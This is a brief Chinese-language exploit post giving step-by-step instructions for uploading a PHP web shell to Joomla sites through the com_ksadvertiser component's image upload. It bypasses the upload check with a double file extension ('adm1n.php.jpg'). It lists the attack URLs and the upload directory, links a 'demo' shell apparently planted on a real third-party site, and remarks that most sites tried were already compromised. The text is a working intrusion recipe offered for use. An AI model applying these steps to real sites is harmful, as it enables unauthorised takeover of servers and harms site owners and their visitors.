作者:1337
1. 有些joomal需要先注冊(cè).
http://site/index.php?option=com_user&view=login
2. 到上傳地址
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. 點(diǎn)擊image后點(diǎn)擊upload,選擇shell, 將shell重名為adm1n.php.jpg格式.
4. 上傳后的文件在 / images/ksadvertiser/U0 這個(gè)目錄下.
http://site/images/ksadvertiser/U0/adm1n.php.gif
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
我隨便測(cè)試了一下, 基本都被搞了. 瘋狂的人們啊, 這今天剛出的漏洞就成這樣了… 1337V5啊.